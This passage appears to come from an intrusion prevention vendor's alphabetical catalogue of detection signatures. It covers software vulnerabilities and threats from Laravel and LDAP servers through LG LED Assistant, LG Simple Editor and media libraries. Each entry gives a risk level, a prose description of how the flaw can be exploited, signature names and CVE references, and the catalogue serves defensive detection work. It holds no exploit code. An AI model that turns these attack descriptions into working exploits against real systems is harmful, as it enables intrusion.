HTTP_CRL-Laquis-Scada-Web-Server-Relatorionome-Nome-Command-Injection

References:

CVE-2018-18996
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18996

Laravel-Remote-Code-Execution-CVE-2018-15133

About this vulnerability:

A vulnerability in Laravel

Risk:

High

First detected in:

sgpkg-ips-1677-5242

Last changed:

sgpkg-ips-1677-5242

Platform:

Generic

Software:

Laravel

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in Laravel Framework versions through 5.5.40 and 5.6.x through 5.6.29. This vulnerability is due to insecure unserialisation of client-provided X-XSRF-TOKEN values.

Situation:

HTTP_CSH-Laravel-Framework-Unusual-X-XSRF-TOKEN-Length

References:

CVE-2018-15133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15133

Large-Content-Length-Value

About this vulnerability:	A large value in Content-Length header
Risk:	Low
First detected in:	sgpkg-ips-174-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Any Software
Type:	Streaming Media
Description:	When a web server serves a file using the Hypertext Transfer Protocol (HTTP), it specifies the length of the file in the Content-Length header. This way, the client knows how large a file it will receive. This information can be used to limit or monitor attempts to download large files.
Situation:	HTTP_SHS-Large-Content-Length-Value

Launch-Command-In-PDF

About this vulnerability:	Launch command in PDF file
Risk:	Low
First detected in:	sgpkg-ips-299-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	<os>
Type:	Code Injection
Description:	The Launch command has been detected inside a PDF document. This may indicate a malicious PDF file.
Situation:	HTTP_SS-Launch-Command-In-PDF File-PDF_Launch-Command-In-PDF

LB-Link-Command-Injection-CVE-2023-26801

About this vulnerability:

A vulnerability in LB-Link wireless routers

Risk:

High

First detected in:

sgpkg-ips-1748-5242

Last changed:

sgpkg-ips-1748-5242

Platform:

Generic

Software:

LB-Link

Type:

Input Validation

Description:

A command injection vulnerability has been reported in the firmware of the LB-Link BL-AC1900, BL-WR9000, BL-X26 and BL-LTE300 wireless routers. An unauthenticated attacker could use this vulnerability to execute arbitrary OS commands via a crafted HTTP request.

Situation:

HTTP_CRL-LB-Link-Command-Injection-CVE-2023-26801

References:

CVE-2023-26801
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26801

LCDproc-Multiple-Buffer-Overflow-Vulnerabilities

About this vulnerability:

A vulnerability in LCDproc

Risk:

Moderate

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; Unix

Software:

LCDproc

Type:

Malfunction

Description:

There are multiple buffer overflows in LCDProc 0.4.1, and possibly other 0.4.x versions up to 0.4.4, allows remote attackers to execute arbitrary code via (1) a long invalid command to parse_all_client_messages function, or (2) long argv command to test_func_func function.

Situation:

Generic_CS-LCDproc-Test-Func-Buffer-Overflow-Vulnerability

References:

CVE-2004-1916
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1916

BID-10085
http://www.securityfocus.com/bid/10085

LCDproc-Parse_All_Client_Messages-Buffer-Overflow

About this vulnerability:

A vulnerability in LCDproc

Risk:

Moderate

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; Unix

Software:

LCDproc

Type:

Malfunction

Description:

Buffer overflow in the parse_all_client_messages function in LCDproc 0.4.x up to 0.4.4 allows remote attackers to execute arbitrary code via a large number of arguments.

Situation:

Generic_CS-LCDproc-Parse_All_Client_Messages-Buffer-Overflow

References:

CVE-2004-1915
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1915

BID-10085
http://www.securityfocus.com/bid/10085

LCDproc-Test_Func-Format-String-Vulnerability

About this vulnerability:

A vulnerability in LCDproc

Risk:

Moderate

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; Unix

Software:

LCDproc

Type:

Malfunction

Description:

There is a format string vulnerability in test_func_func in LCDProc 0.4.1 and earlier allows remote attackers to execute arbitrary code via format string specifiers in the str variable.

Situation:

Generic_CS-LCDproc-Test_Func-Format-String-Vulnerability

References:

CVE-2004-1917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1917

BID-10085
http://www.securityfocus.com/bid/10085

LDAP-IBM-Lotus-Domino-LDAP-Server-Invalid-DN-Message-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in IBM Lotus Domino LDAP service

Risk:

High

First detected in:

sgpkg-ips-106-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 Server; Windows 2000 Advanced Server; Windows 2003; Windows 2003 64-bit

Software:

Lotus Domino

Type:

Buffer Overflow

Description:

IBM Lotus Domino LDAP service has a buffer overflow vulnerability. By sending a crafted LDAP Add request that contains an excessively long DN string, a remote unauthenticated attacker can cause a DoS or compromise the vulnerable system.

Situation:

LDAP_IBM-Lotus-Domino-LDAP-Server-Invalid-DN-Message-Buffer-Overflow

References:

CVE-2007-1739
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1739

BID-23174
http://www.securityfocus.com/bid/23174

OSVDB-34092
http://www.osvdb.org/34092

LDAP-IBM-Tivoli-Directory-Server-LDAP-Buffer-Overflow

About this vulnerability:

Detects Buffer Overflow Exploits Against IBM Tivoli Directory Server

Risk:

Moderate

First detected in:

sgpkg-ips-62-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Directory Server

Type:

Buffer Overflow

Description:

The IBM Tivoli Directory Server product has a buffer overflow vulnerability. The product fails to correctly process the length field of the OCTET STRING object, which leads to an integer overflow with crafted length values. This vulnerability can be used to cause a denial of service and possibly to execute arbitrary code in the context of the vulnerable process.

Situation:

LDAP_IBM-Tivoli-Directory-Server-LDAP-Buffer-Overflow

References:

CVE-2006-0717
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0717

BID-16593
http://www.securityfocus.com/bid/16593

OSVDB-23089
http://www.osvdb.org/23089

LDAP-LSASS-Heap-Overflow-CVE-2010-0820

About this vulnerability:

LDAP LSASS Heap Overflow vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-338-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

Windows LSASS heap overflow vulnerability in LDAP handling, MS10-068.

Situation:

LDAP_CS-LSASS-Heap-Overflow-CVE-2010-0820

References:

CVE-2010-0820
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0820

MS10-068
http://technet.microsoft.com/security/bulletin/MS10-068

LDAP-Microsoft-Active-Directory-LDAP-Search-Request-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Microsoft Active Directory on Windows 2000 Server platform

Risk:

High

First detected in:

sgpkg-ips-179-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000

Software:

<os>

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Active Directory on Windows 2000 Server platform. A remote unauthenticated attacker can send a malicious LDAP SearchRequest which contains a crafted baseObject field to a vulnerable server to cause a denial of service, causing the entire system to shut down or execute arbitrary code with the privileges of the affected process, the System account.

Situation:

Generic_CS-Microsoft-Active-Directory-LDAP-Search-Request-Buffer-Overflow
LDAP_Microsoft-Active-Directory-LDAP-Search-Request-Buffer-Overflow

References:

CVE-2008-4023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4023

BID-31609
http://www.securityfocus.com/bid/31609

OSVDB-49058
http://www.osvdb.org/49058

MS08-060
http://technet.microsoft.com/security/bulletin/MS08-060

LDAP-Novell-eDirectory-evtFilteredMonitorEventsRequest-Function-Heap-Overflow

About this vulnerability:

Heap buffer overflow vulnerability in Novell eDirectory

Risk:

High

First detected in:

sgpkg-ips-84-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell eDirectory

Type:

Buffer Overflow

Description:

Novell eDirectory has a heap buffer overflow vulnerability. The vulnerability allows a remote attacker to cause a DoS or compromise the system running the vulnerable service process.

Situation:

LDAP_Novell-eDirectory-evtFilteredMonitorEventsRequest-Function-Heap-Overflow

References:

CVE-2006-4509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4509

BID-20663
http://www.securityfocus.com/bid/20663

LDAP-Novell-eDirectory-evtFilteredMonitorEventsRequest-Invalid-Free

About this vulnerability:

Memory handling vulnerability in Novell eDirectory

Risk:

Moderate

First detected in:

sgpkg-ips-155-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell eDirectory

Type:

Malfunction

Description:

Novell eDirectory suffers from a vulnerability in memory handling when parsing certain LDAP messages. Remote attackers can exploit the vulnerability by sending crafted LDAP messages to a vulnerable server. A successful exploit allows arbitrary code execution.

Situation:

LDAP_Novell-eDirectory-evtFilteredMonitorEventsRequest-Invalid-Free

References:

CVE-2006-4510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4510

BID-20663
http://www.securityfocus.com/bid/20663

LDAP-OpenLDAP-ber-get-next-BER-Decoding-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in OpenLDAP

Risk:

Moderate

First detected in:

sgpkg-ips-158-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenLDAP

Type:

Malfunction

Description:

OpenLDAP suffers from a design error when decoding ASN.1 BER-encoded network messages. A remote unauthenticated attacker can exploit the vulnerability to cause a denial of service terminating the slapd process.

Situation:

LDAP_OpenLDAP-ber-get-next-BER-Decoding-Denial-Of-Service

References:

CVE-2008-2952
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2952

BID-30013
http://www.securityfocus.com/bid/30013

OSVDB-46689
http://www.osvdb.org/46689

LDAP-OpenLDAP-LDAP-Server-BIND-Request-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in OpenLDAP

Risk:

Moderate

First detected in:

sgpkg-ips-84-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

OpenLDAP

Type:

Malfunction

Description:

OpenLDAP has a denial of service vulnerability. The vulnerability allows a remote attacker to cause a DoS by sending a crafted BIND request with a malicious CRAM-MD5 credentials string.

Situation:

LDAP_OpenLDAP-LDAP-Server-BIND-Request-Denial-Of-Service

References:

CVE-2006-5779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5779

BID-20939
http://www.securityfocus.com/bid/20939

LDAP-Oracle-Internet-Directory-Pre-Authentication-LDAP-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in Oracle Internet Directory

Risk:

Moderate

First detected in:

sgpkg-ips-180-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Oracle Application Server; Oracle Identity Manager

Type:

Malfunction

Description:

There is a denial of service vulnerability in Oracle Internet Directory. A remote unauthenticated attacker can send malicious bindRequest messages repeatedly in the same session to the vulnerable server to cause a denial of service condition.

Situation:

LDAP_Oracle-Internet-Directory-Pre-Authentication-LDAP-Denial-Of-Service

References:

CVE-2008-2595
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2595

BID-30177
http://www.securityfocus.com/bid/30177

LDAP-Sun-Directory-Server-LDAP-DOS

About this vulnerability:

Denial of service vulnerability in Sun Directory Server

Risk:

Moderate

First detected in:

sgpkg-ips-200-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris 9

Software:

Sun Microsystems JavaSystem Directory Server

Type:

Malfunction

Description:

There exists a vulnerability in the Sun Directory Server. The flaw is caused due to improper handling of certain overly large LDAP messages. An unauthenticated remote attacker may exploit this vulnerability by sending a crafted LDAP message to the target host, which may terminate the affected LDAP server on the target system.

Situation:

Generic_Sun-Directory-Server-LDAP-DOS-2
LDAP_Sun-Directory-Server-LDAP-DOS

References:

CVE-2006-0647
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0647

BID-16550
http://www.securityfocus.com/bid/16550

Leadtools-Raster-Twain-Ltocxtwainu-ActiveX-Control-Buffer-Overflow

About this vulnerability:	A vulnerability in LEAD Technologies LEADTOOLS Raster Twain
Risk:	High
First detected in:	sgpkg-ips-373-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	LEAD Technologies LEADTOOLS Raster Twain
Type:	Buffer Overflow
Description:	Three is a buffer overflow vulnerability in LEADTOOLS Raster Twain LtocxTwainu ActiveX control. The vulnerability is due to a boundary error while parsing the AppName parameter of the affected ActiveX control. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation of this vulnerability would result in a heap buffer overflow and allow for arbitrary code execution in the context of the current user.
Situation:	HTTP_SS-Leadtools-Raster-Twain-Ltocxtwainu-ActiveX-Control-Buffer-Overflow File-Text_Leadtools-Raster-Twain-Ltocxtwainu-ActiveX-Control-Buffer-Overflow

LeapWare-LeapFTP-Pasv-Reply-Buffer-Overflow

About this vulnerability:

A LeapWare LeapFTP Pasv Reply Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-735-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

LeapWare LeapFTP

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in LeapWare LeapFTP, version 2.7.3.600, which allows remote attacker to execute arbitrary code via a long IP address response to a PASV request.

Situation:

FTP_SS-CA-eTrust-Secure-Content-Manager-Gateway-FTP-Pasv-Stack-Overflow

References:

CVE-2003-0558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0558

BID-7860
http://www.securityfocus.com/bid/7860

OSVDB-4587
http://www.osvdb.org/4587

Legacy-Chakra-Based-Microsoft-Edge-Usage

About this vulnerability:	Obsolete Edge browser usage detected
Risk:	High
First detected in:	sgpkg-ips-1793-5242
Last changed:	sgpkg-ips-1793-5242
Platform:	Windows
Software:	Microsoft Edge
Type:	Browser
Description:	This fingerprint detects the usage of legacy Chakra-based Microsoft Edge browsers. They were based on the Chakra JavaScript engine, which were officially replaced by the V8 engine in January 2020. Chakra-based Microsoft Edge browsers are obsolete and contain a large number of critical vulnerabilities, and thus, should not be allowed in high-security environments.
Situation:	HTTP_CSH-Legacy-Chakra-Based-Microsoft-Edge-Usage

Lethic

About this vulnerability:	Lethic
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Lethic is a Botnet that is used to send spam.
Situation:	HTTP_CS-Lethic-Activity Generic_CS-Lethic-Activity File-Text_Lethic-Activity

Lets-Encrypt-Signed-Certificate

About this vulnerability:	Certificate signed by Let's Encrypt
Risk:	Low
First detected in:	sgpkg-ips-722-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic browser
Type:	Insecure Configuration
Description:	Let's encrypt is a free certificate authority trusted by most modern browsers. As fully automated and free service, this can sometimes be used for encrypted malware delivery.
Situation:	HTTPS_SS-Lets-Encrypt-Signed-Certificate

Lexmark-Device-Embedded-Web-Server-RCE

About this vulnerability:

An attempt to exploit a vulnerability in a Lexmark device detected

Risk:

High

First detected in:

sgpkg-ips-1659-5242

Last changed:

sgpkg-ips-1659-5242

Platform:

Unix

Software:

Lexmark

Type:

Input Validation

Description:

A vulnerability in the embedded webserver in certain Lexmark devices through 2023-02-19 which allows remote attackers to execute arbitrary code via several configurable parameters on the page, including FT_Custom_lbtrace, due to insufficient input validation.

Situation:

HTTP_CRL-Lexmark-Device-Embedded-Web-Server-RCE

References:

CVE-2023-26067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26067

Lexmark-Markvision-Enterprise-Libraryfileuploadservlet-Directory-Traversal

About this vulnerability:

A vulnerability in Lexmark MarkVision Enterprise

Risk:

High

First detected in:

sgpkg-ips-637-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Lexmark MarkVision Enterprise

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Lexmark Markvision Enterprise. The vulnerability is due to insufficient input validation in LibraryFileUploadServlet when processing zip files. A remote, unauthenticated attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Zip_Lexmark-Markvision-Enterprise-Libraryfileuploadservlet-Directory-Traversal

References:

CVE-2014-9375
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9375

Lexmark-Markvision-Enterprise-Remote-Code-Execution

About this vulnerability:

A Lexmark Markvision Enterprise Remote Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-696-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Lexmark MarkVision Enterprise

Type:

Input Validation

Description:

A vulnerability in Lexmark MarkVision Enterprise, versions before 2.1, which allow remote attackers to execute arbitrary code due to the insufficient sanitization of user input.

Situation:

HTTP_CSH-Lexmark-Markvision-Enterprise-Remote-Code-Execution

References:

CVE-2014-8741
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8741

LG-LED-Assistant-API-Changepw-Unverified-Password-Reset

About this vulnerability:

A vulnerability in LG LED Assistant

Risk:

High

First detected in:

sgpkg-ips-1723-5242

Last changed:

sgpkg-ips-1723-5242

Platform:

Generic

Software:

LG LED Assistant

Type:

Malfunction

Description:

An unverified password reset vulnerability has been reported for LG LED Assistant. This vulnerability is due to the design weakness in the API changePw endpoint. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary password reset without any verification.

Situation:

HTTP_CSH-LG-LED-Assistant-API-Changepw-Unverified-Password-Reset

References:

CVE-2024-2862
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2862

LG-LED-Assistant-API-Thumbnail-Directory-Traversal

About this vulnerability:

A vulnerability in LG LED Assistant

Risk:

High

First detected in:

sgpkg-ips-1720-5242

Last changed:

sgpkg-ips-1720-5242

Platform:

Generic

Software:

LG LED Assistant

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported for LG LED Assistant. This vulnerability is due to lack of sanitation on the upload file name in the API thumbnail endpoint. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary file write and, in the worst case, remote code execution in the context of the current user.

Situation:

HTTP_CRL-LG-LED-Assistant-Setthumbnailrc-Directory-Traversal

References:

CVE-2024-2863
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2863

LG-LED-Assistant-Setthumbnailrc-Directory-Traversal

About this vulnerability:	A vulnerability in LG LED Assistant
Risk:	High
First detected in:	sgpkg-ips-1705-5242
Last changed:	sgpkg-ips-1705-5242
Platform:	Generic
Software:	LG LED Assistant
Type:	Directory Traversal
Description:	A remote code execution vulnerability has been reported for LG LED Assistant. This vulnerability is due to a directory traversal in the setThumbnailRc endpoint. Successfully exploiting this vulnerability could result in arbitrary creation of file or, in the worst case, remote code execution in the context of the current user.
Situation:	HTTP_CRL-LG-LED-Assistant-Setthumbnailrc-Directory-Traversal

LG-LED-Assistant-Updatefile-Directory-Traversal

About this vulnerability:	A vulnerability in LG LED Assistant
Risk:	High
First detected in:	sgpkg-ips-1677-5242
Last changed:	sgpkg-ips-1677-5242
Platform:	Generic
Software:	LG LED Assistant
Type:	Directory Traversal
Description:	A directory traversal vulnerability has been reported in LG LED Assistant due to improper validation of user data sent to "/api/download/updateFile" endpoint. A remote unauthenticated attacker could exploit this vulnerability by a sending crafted request to the target server. Successful exploitation could result in information disclosure in the context of the current user.
Situation:	HTTP_CSU-LG-LED-Assistant-Updatefile-Directory-Traversal

LG-LED-Assistant-Upload-Directory-Traversal

About this vulnerability:	A vulnerability in LG LED Assistant
Risk:	High
First detected in:	sgpkg-ips-1670-5242
Last changed:	sgpkg-ips-1670-5242
Platform:	Generic
Software:	LG LED Assistant
Type:	Directory Traversal
Description:	Directory traversal vulnerabilities have been reported in LG LED Assistant. The vulnerabilities are due to improper validation of user data sent to "/api/settings/upload" endpoint. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary write access to the server which, in the worst case, can be utilized to achieve arbitrary code execution under the security context of the application.
Situation:	HTTP_CSU-LG-LED-Assistant-Upload-Directory-Traversal

LG-N1A1-NAS-Remote-Command-Execution-CVE-2018-14839

About this vulnerability:

An attempt to exploit a vulnerability in LG N1A1 NAS detected

Risk:

High

First detected in:

sgpkg-ips-1627-5242

Last changed:

sgpkg-ips-1627-5242

Platform:

Generic

Software:

LG N1A1 NAS

Type:

Input Validation

Description:

LG N1A1 NAS 3718.510 is affected by a remote command execution vulnerability, which could be exploited by sending HTTP POST requests with malicious parameters to various endpoints of the device.

Situation:

HTTP_CRL-LG-N1A1-NAS-Remote-Command-Execution-CVE-2018-14839

References:

CVE-2018-14839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14839

LG-Simple-Editor-Command-Injection-CVE-2023-40504

About this vulnerability:

An attempt to exploit a vulnerability in LG Simple Editor detected

Risk:

High

First detected in:

sgpkg-ips-1769-5242

Last changed:

sgpkg-ips-1769-5242

Platform:

Windows

Software:

LG Simple Editor

Type:

Input Validation

Description:

A vulnerability in LG Simple Editor, versions 3.21.0 and before, which allows remote attackers to execute arbitrary commands through the readVideoInfo method, due to improper validation of user input.

Situation:

HTTP_CRL-LG-Simple-Editor-Command-Injection-CVE-2023-40504

References:

CVE-2023-40504
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40504

LG-Simple-Editor-Copystickercontent-Directory-Traversal

About this vulnerability:

A vulnerability in LG Simple Editor

Risk:

High

First detected in:

sgpkg-ips-1635-5242

Last changed:

sgpkg-ips-1635-5242

Platform:

Generic

Software:

LG Simple Editor

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in LG Simple Editor. This vulnerability is due to improper input validation when handling the copyStickerContent command. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in sensitive information disclosure and overwriting of arbitrary files in the context of SYSTEM. The vendor, LG, has not addressed this vulnerability.

Situation:

File-Text_LG-Simple-Editor-Copystickercontent-Directory-Traversal

References:

CVE-2023-40496
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40496

LG-Simple-Editor-Copytemplateall-Directory-Traversal

About this vulnerability:

A vulnerability in LG Simple Editor

Risk:

Moderate

First detected in:

sgpkg-ips-1654-5242

Last changed:

sgpkg-ips-1654-5242

Platform:

Generic

Software:

LG Simple Editor

Type:

Directory Traversal

Description:

Improper input validation in the copyTemplateAll method causes a directory traversal vulnerability in LG Simple Editor. A successful exploit allows an attacker to cause a denial of service condition or an information disclosure.

Situation:

File-Text_LG-Simple-Editor-Copytemplateall-Directory-Traversal

References:

CVE-2023-40495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40495

LG-Simple-Editor-Cropimage-Directory-Traversal

About this vulnerability:

A vulnerability in LG Simple Editor

Risk:

Moderate

First detected in:

sgpkg-ips-1647-5242

Last changed:

sgpkg-ips-1647-5242

Platform:

Generic

Software:

LG Simple Editor

Type:

Directory Traversal

Description:

Improper input validation in the cropImage command causes a directory traversal vulnerability in LG Simple Editor. A successful exploit allows an attacker to delete arbitrary files on the target system.

Situation:

HTTP_CRL-LG-Simple-Editor-Cropimage-Directory-Traversal

References:

CVE-2023-40502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40502

LG-Simple-Editor-Deletechecksession-Directory-Traversal

About this vulnerability:

A vulnerability in LG Simple Editor

Risk:

High

First detected in:

sgpkg-ips-1641-5242

Last changed:

sgpkg-ips-1641-5242

Platform:

Generic

Software:

LG Simple Editor

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in LG Simple Editor. This vulnerability is due to improper input validation in the deleteCheckSession method. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary deletion of files or, in the worst case, denial of service.

Situation:

HTTP_CS-LG-Simple-Editor-Deletechecksession-Directory-Traversal

References:

CVE-2023-40492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40492

LG-Simple-Editor-Deletefolder-Directory-Traversal

About this vulnerability:

A vulnerability in LG Simple Editor

Risk:

High

First detected in:

sgpkg-ips-1638-5242

Last changed:

sgpkg-ips-1638-5242

Platform:

Generic

Software:

LG Simple Editor

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in LG Simple Editor. This vulnerability is due to improper input validation in the deleteFolder method. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in deleting arbitrary files in the context of SYSTEM.

Situation:

HTTP_CS-LG-Simple-Editor-Deletefolder-Directory-Traversal

References:

CVE-2023-40494
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40494

LG-Simple-Editor-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in LG Simple Editor detected

Risk:

High

First detected in:

sgpkg-ips-1650-5242

Last changed:

sgpkg-ips-1650-5242

Platform:

Windows

Software:

LG Simple Editor

Type:

Malfunction

Description:

A vulnerability in LG Simple Editor, 3.21 and before, which allows remote attackers to upload and execute a malicious JSP file with the SYSTEM user permissions.

Situation:

HTTP_CS-LG-Simple-Editor-Remote-Code-Execution

References:

CVE-2023-40498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40498

LG-Simple-Editor-Savexml-Directory-Traversal

About this vulnerability:

A vulnerability in LG Simple Editor

Risk:

High

First detected in:

sgpkg-ips-1643-5242

Last changed:

sgpkg-ips-1643-5242

Platform:

Generic

Software:

LG Simple Editor

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in LG Simple Editor. This vulnerability is due to improper input validation in the saveXml command. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result remote code execution in the context of SYSTEM.

Situation:

File-Text_LG-Simple-Editor-Savexml-Directory-Traversal

References:

CVE-2023-40497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40497

Lianja-SQL-DbNetserver-Stack-Buffer-Overflow

About this vulnerability:

A stack buffer overflow vulnerability in Lianja SQL Server

Risk:

Moderate

First detected in:

sgpkg-ips-595-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Lianja SQL Server

Type:

Buffer Overflow

Description:

A vulnerability in Lianja SQL Servers before version 1.0.0 RC 5.2 allows an attacker to cause denial of service or possible code execution in target machine.

Situation:

Generic_CS-Lianja-SQL-DbNetserver-Stack-Buffer-Overflow

References:

CVE-2013-3563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3563

OSVDB-93759
http://www.osvdb.org/93759

Libav-LZO-Integer-Overflow

About this vulnerability:

A vulnerability in Libav Team libav

Risk:

Moderate

First detected in:

sgpkg-ips-597-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

libav

Type:

Integer Overflow

Description:

A code execution vulnerability exists in the libav library. The vulnerability is due to an integer overflow while processing literal runs in the LZO compressed data. A remote unauthenticated attacker could exploit this vulnerability by enticing a target user to open a crafted file with an application using affected libraries. Successful exploitation could lead to arbitrary code execution in the security context of the target user.

Situation:

File-Binary_Libav-LZO-Integer-Overflow

References:

CVE-2014-4609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4609

BID-68217
http://www.securityfocus.com/bid/68217

OSVDB-108490
http://www.osvdb.org/108490

Libcue-Out-Of-Bounds-Array-Access-CVE-2023-43641

About this vulnerability:

A vulnerability in Libcue

Risk:

High

First detected in:

sgpkg-ips-1639-5242

Last changed:

sgpkg-ips-1639-5242

Platform:

Generic

Software:

libcue

Type:

Input Validation

Description:

An out-of-bounds array access vulnerability has been reported in libcue 2.2.1 and earlier. An attacker can exploit this vulnerability by enticing a user to download a maliciously crafted cue sheet. On GNOME desktop environments this may lead to remote command execution.

Situation:

File-Text_Libcue-Out-Of-Bounds-Array-Access-CVE-2023-43641

References:

CVE-2023-43641
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43641

Libflac-Picture-Metadata-Picture-Description-Size-Buffer-Overflow

About this vulnerability:

A vulnerability in FLAC Project libFLAC

Risk:

Moderate

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

libflac

Type:

Buffer Overflow

Description:

A heap memory overflow vulnerability exists in the Free Lossless Audio Codec (FLAC) library embedded and used by various products. The vulnerability is due to boundary errors when processing FLAC audio files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted FLAC audio file. Successful exploitation may lead to arbitrary code execution in the security context of the affected application, normally using the privileges of the logged in user. In a attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the currently logged in user. In an attack case where code injection is not successful, the application that processes the malicious FLAC file will terminate abnormally.

Situation:

File-Binary_Libflac-Picture-Metadata-Picture-Description-Size-Buffer-Overflow

References:

CVE-2007-4619
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4619

BID-26042
http://www.securityfocus.com/bid/26042

Libmspack-Project-Cabd_Sys_Read_Block-Off-By-One

About this vulnerability:

A vulnerability in the libmspack library

Risk:

Moderate

First detected in:

sgpkg-ips-1116-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

libmspack; cabextract

Type:

Malfunction

Description:

An off-by-one vulnerability has been reported in the libmspack library. A remote attacker could exploit this vulnerability by enticing a target user to open an malicious crafted CAB file with an application that uses vulnerable library. Successful exploitation of the vulnerability may result in arbitrary code execution under the security context of the user.

Situation:

File-Binary_Libmspack-Project-Cabd_Sys_Read_Block-Off-By-One

References:

CVE-2018-18584
